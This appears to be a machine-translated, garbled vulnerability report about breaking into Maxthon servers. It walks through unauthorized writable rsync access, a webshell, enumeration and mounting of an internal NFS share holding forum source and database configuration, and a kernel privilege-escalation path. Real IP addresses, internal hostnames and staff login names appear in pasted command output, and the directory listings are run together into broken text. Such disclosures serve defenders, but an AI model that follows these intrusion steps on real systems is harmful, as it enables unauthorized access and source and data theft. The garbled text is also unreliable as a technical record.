Ao you's internal network is not completely roaming (a large number of internal and external network source code can be leaked)
I was wondering if I could prove that I had access to the data of the proud game users. The Administrator found that I only had access to the bbs users.
Rsync unauthorized access
Writable
Rsync 60.28.210.24: I. mx/drwxrwxr-x 8192 19:10:44. -rw-r -- 6036 13:30:47 build.txt-rw-r -- 31 19:10:23 conf. php-rw-r -- 1406 2013/10/21 13:30:49 favicon. ico-rw-r -- 7166 2014/01/13 15:40:28 feedback.htm-rw-r -- 55790 2014/01/13 15:40:28 index.htm-rw-r -- 132 13:31:34 index.so.htm-rw-r -- r -- 137 13:31:34 index.v3.html rwxrwxrwx 31 20 14/02/20 17:52:51 key-rw-r -- 30 2013/10/21 13:31:37 test. php-rw-r -- 214 2013/05/30 15:00:17 ??? ν ???. Url-rw-r -- 214 17:35:44 ?? \ #2022 ?????? #212 ?? \ #227 ¥. url-rw-r -- 214 13:31:39? #202? You? #212? #227 ?. 23:38:53 branchdrwxr-xr-x 8192 running 23:38:55 chajiandrwxr-xr-x 8192 running 16:14:21 cssdrwxr-x 8192 15:59:24 datadrwxr-xr-x 8192 11:34:51 datadrwxr-xr-x 8192 14:46:07 decent_htmldrwxr-xr-x 8192 23:43:03 do_not_deletedrwxr-xr-x 8192 19:17:48 8192 17:36:03 I. maxthon. cndrwxr-xr-x 8192 23:42:36 I. mx_updatedrwxr-xr-x 8192 14:46:08 I. 10:52:17 imagesdrwxr-xr-x 8192 running 15:59:24 jsdrwxr-xr-x 8192 running 17:38:46 macdrwxr-xr-x 8192 running 15:31:19 minidrwxr-xr-x 8192 14:46:20 sounddrwxr-xr- x 8192 18:05:43 testdrwxr-xr-x 8192 2013/05/20 18:05:43 tuandrwxr-xr-x 8192 18:05:43 am-xr-x 8192 18:05:43 am-xr-x 8192 18:05:43 am-xr-x 8192 am-x 18:05:43 v3betadrwxr-xr-x 8192 19:08:28 widget
These files are not found on the web. I. mx assumes that they are I .maxthon.cn.
Ping I .maxthon.cn and find that the ip address is incorrect.
Decisively bind the host to I .maxthon.cn 60.28.210.24
The current directory file getshell is successfully accessed.
Analysis found
Glusterfs #192.168.0.166:/other
504G 160G 320G 34%/mnt/nfs
Nfs mount directory
A large number of source code leaks
[/]$ showmount -e 192.168.0.166Export list for 192.168.0.166:/other */bbs *
We found that there is still a bbs directory under 166.
/]$ uname -aLinux cms13393 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64 x86_64 x86_64 GNU/Linux
Privilege Escalation due to low kernel version on the local machine
Nfs mounting
mount -t nfs 192.168.0.166:/bbs /tmp/nfs
Bbs.maxthon.cn is successfully mounted to the Forum.
View Database Configuration connectable
The Administrator is checking the log and stops the test submission.
root 28678 0.0 0.0 58896 536 pts/0 S+ 21:50 0:00 tail -f mx.13393/access_20141223.logroot 28703 0.0 0.0 88936 3252 ? Ss 21:50 0:00 sshd: root [priv]sshd 28704 0.0 0.0 64096 1460 ? S 21:50 0:00 sshd: root [net] root 28712 0.0 0.0 10456 872 ? R 21:50 0:00 ps -auxroot 30487 0.0 0.0 102004 916 ? S Feb09 0:00 crondroot 30488 0.0 0.0 8696 828 ? Ss Feb09 0:00 /bin/bash -c /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.php > /dev/null 2>&1root 30511 0.0 0.1 91052 4448 ? S Feb09 0:03 /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.phpsh-3.2# whosongqi pts/0 Dec 23 21:42 (10.0.8.249)skyyuan pts/1 Dec 23 21:44 (10.0.8.249)
Solution:
Enhanced Filtering